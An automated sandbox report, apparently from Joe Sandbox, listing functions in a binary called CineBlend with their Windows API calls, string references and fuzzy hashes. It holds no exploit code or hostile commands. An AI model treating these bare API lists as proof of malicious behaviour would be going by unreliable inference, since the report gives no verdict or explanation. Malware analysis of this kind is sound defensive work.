Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: a27f311b4233b64a78781ef0aa617595051ef28bd458f24c344b434ebfd7e5c1
Instruction ID: 2b184e8daae1cf64c10988516610b458ddc97ea0e6c8cf870656749971020f54
Opcode Fuzzy Hash: a27f311b4233b64a78781ef0aa617595051ef28bd458f24c344b434ebfd7e5c1
Instruction Fuzzy Hash: 38113A35A01119ABCB00DFA8C986DEEB7F8EB05345F5048A6E922E3140C771BA91DBA1

Function 00B9EAED Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00B9EB14
MessageBoxW.USER32(?,?,?,?), ref: 00B9EB47
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00B9EB5D
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00B9EB64

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 75c091567dd73a08be85f6826e138825dc9e5687814a2d8d2cdc3a37bf8f47b2
Instruction ID: b569713d864e08a19314e58e3b27403fb6755d30ce4ff71a1b8b615ab600f2b4
Opcode Fuzzy Hash: 75c091567dd73a08be85f6826e138825dc9e5687814a2d8d2cdc3a37bf8f47b2
Instruction Fuzzy Hash: 1011D676900258BFDB01DFA89C49F9E7FEDEB45320F1542B6F825E32A0D675C90487A1

Function 00B5D53C Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,00B5D369,00000000,00000004,00000000), ref: 00B5D588
GetLastError.KERNEL32 ref: 00B5D594
__dosmaperr.LIBCMT ref: 00B5D59B
ResumeThread.KERNEL32(00000000), ref: 00B5D5B9

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: f1ec01369b5efa9f413c625d5ce10769b55a2cb3124ea1bf1c4b02d6d0958dd6
Instruction ID: 6f44b0277bc29404d90576551f4861f28840ee89ca0b429809aa4db846c59096
Opcode Fuzzy Hash: f1ec01369b5efa9f413c625d5ce10769b55a2cb3124ea1bf1c4b02d6d0958dd6
Instruction Fuzzy Hash: BE01C436401114ABDB316FA5EC05FAA7BA9EF85336F1003E5FD25971E0EB708809C6A1

Function 00B37873 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00B378B1
GetStockObject.GDI32(00000011), ref: 00B378C5
SendMessageW.USER32(00000000,00000030,00000000), ref: 00B378CF

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: e470a3a5e4d1dc7d27e98166164a2883535f65daeaeb807cc0f3fbca6d4e698d
Instruction ID: f69c9870c8f5fb69c1d9b59bf681f67c34e9253d3e4a70b862082a79f0745dff
Opcode Fuzzy Hash: e470a3a5e4d1dc7d27e98166164a2883535f65daeaeb807cc0f3fbca6d4e698d
Instruction Fuzzy Hash: 1311D2B2505508BFDF225F95CC98EEABBADFF08364F140166FA0452120DB31DC60EBA0

Function 00B633E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00BA11D9,00000000,00000000,?,00B6338D,00BA11D9,00000000,00000000,00000000,?,00B635FE,00000006,FlsSetValue), ref: 00B63418
GetLastError.KERNEL32(?,00B6338D,00BA11D9,00000000,00000000,00000000,?,00B635FE,00000006,FlsSetValue,00BD3260,FlsSetValue,00000000,00000364,?,00B631B9), ref: 00B63424
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00B6338D,00BA11D9,00000000,00000000,00000000,?,00B635FE,00000006,FlsSetValue,00BD3260,FlsSetValue,00000000), ref: 00B63432

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: f4b106b55e311389980f1279ba04b419c9273b816f9b4433b0c2aa10cb2fe146
Instruction ID: 5eec95abbb5aa9e33d8b733bc1de793fb4a9bc24b24662471540180cdbc24383
Opcode Fuzzy Hash: f4b106b55e311389980f1279ba04b419c9273b816f9b4433b0c2aa10cb2fe146
Instruction Fuzzy Hash: 50017136A112229BCB224B69DC84A5ABBD8EF45FA17250660F906D7381DF28DD01C6E0

Function 00B97DCB Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00B97DE6
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00B97DFE
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00B97E13
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00B97E31

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: cf35dc32ab59136ffe277e5eb60307ee4b169db8777513a0780b146902969d23
Instruction ID: 71629c90658cda191449bc7185b91a40983a94bd8d397bfe658079903801fb5a
Opcode Fuzzy Hash: cf35dc32ab59136ffe277e5eb60307ee4b169db8777513a0780b146902969d23
Instruction Fuzzy Hash: 29116DB9259B05ABEB208F64ED48F927BFCEB04B00F1085F9A616D7150EBB0ED04DB50

Function 00B9BA6F Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00B9B69A,?,00008000), ref: 00B9BA8B
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00B9B69A,?,00008000), ref: 00B9BAB0
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00B9B69A,?,00008000), ref: 00B9BABA
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00B9B69A,?,00008000), ref: 00B9BAED

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 4c4a743734c26f15ff228f5d59ad93e7540ef11751523c8f642c3bf7ee3492f3
Instruction ID: ce1a2000e60322690d5c945d228544b99fcc9ac92a9f9ae0dfe21bde54477d61
Opcode Fuzzy Hash: 4c4a743734c26f15ff228f5d59ad93e7540ef11751523c8f642c3bf7ee3492f3
Instruction Fuzzy Hash: FD112771C00A29E7CF00AFA5EA49AEEBBB8BF09711F1141A5D941B3140CF3096508BA5

Function 00BC886F Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00BC888E
ScreenToClient.USER32(?,?), ref: 00BC88A6
ScreenToClient.USER32(?,?), ref: 00BC88CA
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00BC88E5

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 599c616f5c55b2f173d8a0845fb0632c3d22d6008a3cfd394a3e38f726948ffb
Instruction ID: 1325904e1888a8c131c811084f6622b8f2e2fb7f0385c812a0935693e54365fd
Opcode Fuzzy Hash: 599c616f5c55b2f173d8a0845fb0632c3d22d6008a3cfd394a3e38f726948ffb
Instruction Fuzzy Hash: 6B1140B9D00209AFDB41CFA8C884AEEBBF5FB08310F508166E915E3650DB35AA54CF50

Function 00B936F4 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00B93712
GetWindowThreadProcessId.USER32(?,00000000), ref: 00B93723
GetCurrentThreadId.KERNEL32 ref: 00B9372A
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00B93731

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: f107c90e14cf7387c3f4ad60fe1380b7a4912b8552c37e7143708f07df467421
Instruction ID: dbfcba744fd42dd1c5a30007fba44aaea34170d944c47b1f6176b417a1ff91c7
Opcode Fuzzy Hash: f107c90e14cf7387c3f4ad60fe1380b7a4912b8552c37e7143708f07df467421
Instruction Fuzzy Hash: 7AE06DB52012247BDA2017A29C8DEEBBFACDB4ABA1F000075F105D2080DEB48941C2B0

Function 00BC92BF Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00B31F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00B31F87
Part of subcall function 00B31F2D: SelectObject.GDI32(?,00000000), ref: 00B31F96
Part of subcall function 00B31F2D: BeginPath.GDI32(?), ref: 00B31FAD
Part of subcall function 00B31F2D: SelectObject.GDI32(?,00000000), ref: 00B31FD6

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00BC92E3
LineTo.GDI32(?,?,?), ref: 00BC92F0
EndPath.GDI32(?), ref: 00BC9300
StrokePath.GDI32(?), ref: 00BC930E

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 39d06ea1e29faa8d228ebff6c98755fa95c67ebb6a7d45052845c8a27af308ab
Instruction ID: 3315b87b96c738024cc856d6dbcae9dfd544f8f326a03adf8940effab91f5e78
Opcode Fuzzy Hash: 39d06ea1e29faa8d228ebff6c98755fa95c67ebb6a7d45052845c8a27af308ab
Instruction Fuzzy Hash: F3F08236005258BBEB125F58AC0EFCE3F99AF0E320F048045FA11220E1CB759522DFE9

Function 00B321A0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00B321BC
SetTextColor.GDI32(?,?), ref: 00B321C6
SetBkMode.GDI32(?,00000001), ref: 00B321D9
GetStockObject.GDI32(00000005), ref: 00B321E1

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 69f7fe715f42ec845e813e003aec2fa16a7201502032466685cb065a80fad3ab
Instruction ID: a1313dbac295a352015b7eac5e0626208386af67d400ee529d9d6cfc420064ce
Opcode Fuzzy Hash: 69f7fe715f42ec845e813e003aec2fa16a7201502032466685cb065a80fad3ab
Instruction Fuzzy Hash: 23E06535240640AEDB215B74AC09BE87B91EB15736F18C269F7B9650E0CB718640AB11

Function 00B8EC36 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00B8EC36
GetDC.USER32(00000000), ref: 00B8EC40
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B8EC60
ReleaseDC.USER32(?), ref: 00B8EC81

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: a9edd905892d02c913db1298dd695b1bef75d1f9046c1a8010ff27e21ed0fcbd
Instruction ID: ef5c44ddb25d5c201bf54dea4bc65ac48be3554ad629a37eee4c6d73e2b29939
Opcode Fuzzy Hash: a9edd905892d02c913db1298dd695b1bef75d1f9046c1a8010ff27e21ed0fcbd
Instruction Fuzzy Hash: CBE09AB9C00204EFCB41AFA4D949E5DBBF5FB5C311F1084A9E95AE3250CB789942EF10

Function 00B8EC4A Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00B8EC4A
GetDC.USER32(00000000), ref: 00B8EC54
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B8EC60
ReleaseDC.USER32(?), ref: 00B8EC81

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: a84d174a79184f5e52dcf74a908cde3991fc4378c97177c05ccabc622f24d26b
Instruction ID: 97cd57f970b985fa5d3622a0f8e0c35b49c9f47fe6af2674a9cb7339c6a1ce78
Opcode Fuzzy Hash: a84d174a79184f5e52dcf74a908cde3991fc4378c97177c05ccabc622f24d26b
Instruction Fuzzy Hash: BCE09AB9C00204DFCB519FA4D949A5DBBF5BB5C311F108469E959E3250CB785902DF10

Function 00BA57CC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00B341EA: _wcslen.LIBCMT ref: 00B341EF

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00BA5919

Strings

LPT, xrefs: 00BA5840
*, xrefs: 00BA5855

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: 0ab313e47c23900de08bd186d002f85b203f16ebd1844880917b22d09b5920d3
Instruction ID: a5a5b8d060047a0b35e74b6f93b29b202282057a2a3d2b10ee98750ed10434c2
Opcode Fuzzy Hash: 0ab313e47c23900de08bd186d002f85b203f16ebd1844880917b22d09b5920d3
Instruction Fuzzy Hash: 19916875A04604DFCB24DF54C494AAABBF1EF49314F1980D9E84A9F362C735EE85CB90

Function 00B5E5ED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00B5E67D

Strings

pow, xrefs: 00B5E655, 00B5E672

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 24cc6bd3601349fcc0a1c0bccf8335377958ce7aac9f6d2f7fc42dc4b7f86d64
Instruction ID: 6e99a8a521f15e107aae5d5a257b2c72e2a708e054ac79fde84acfc8d893eac9
Opcode Fuzzy Hash: 24cc6bd3601349fcc0a1c0bccf8335377958ce7aac9f6d2f7fc42dc4b7f86d64
Instruction Fuzzy Hash: 6E51D060E0910286C7197714CD5137A6BE0EB15B81F304FD9F8A5922E9EF39CF8A9A47

Function 00B4A8EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 00B4A916

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 3ecb4fb07f17483ad78d213fa62ff5ffb75334cc160bf25241fd155114e37717
Instruction ID: 9d32120f2d50fa5cc4218185317f54daa713b79aa198d407fa41f67db762666e
Opcode Fuzzy Hash: 3ecb4fb07f17483ad78d213fa62ff5ffb75334cc160bf25241fd155114e37717
Instruction Fuzzy Hash: 96510136504246DFCB25EF28C481AFA7BE4EF15310FA840D5F8919B3E1DA349E82DB61

Function 00B4F6CA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00B4F6DB
GlobalMemoryStatusEx.KERNEL32(?), ref: 00B4F6F4

Strings

@, xrefs: 00B4F6E8

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 7212d11ae88ca4178ae38dcea5d7217bbbc3f1c2d6e5661c1d5dda89b470debf
Instruction ID: cc5e19790cce756345e0108f343006778481d6cd441348b6b28eb01509300329
Opcode Fuzzy Hash: 7212d11ae88ca4178ae38dcea5d7217bbbc3f1c2d6e5661c1d5dda89b470debf
Instruction Fuzzy Hash: 405139B1408748ABD320AF10DC86BABB7ECFB94304F91489EF1D952191DF709529CB67

Function 00BB61A2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?), ref: 00BB623D
_wcslen.LIBCMT ref: 00BB6249

Strings

CALLARGARRAY, xrefs: 00BB6243, 00BB6248

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: a526bf40d9c61834ff601a16746eb9ce28fc16d2afa0b1008ab48abeb72b6154
Instruction ID: a9828c16c1b28e6c980638eda522e1fb24f34d49cdb9a41d7db399a9c04c8057
Opcode Fuzzy Hash: a526bf40d9c61834ff601a16746eb9ce28fc16d2afa0b1008ab48abeb72b6154
Instruction Fuzzy Hash: DE41BD75E002199FDB04DFA8C8819FEBBF5FF58364F1040A9E506A7252EBB49D81CB90

Function 00BADB39 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00BADB75
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00BADB7F

Strings

|, xrefs: 00BADB50

Memory Dump Source

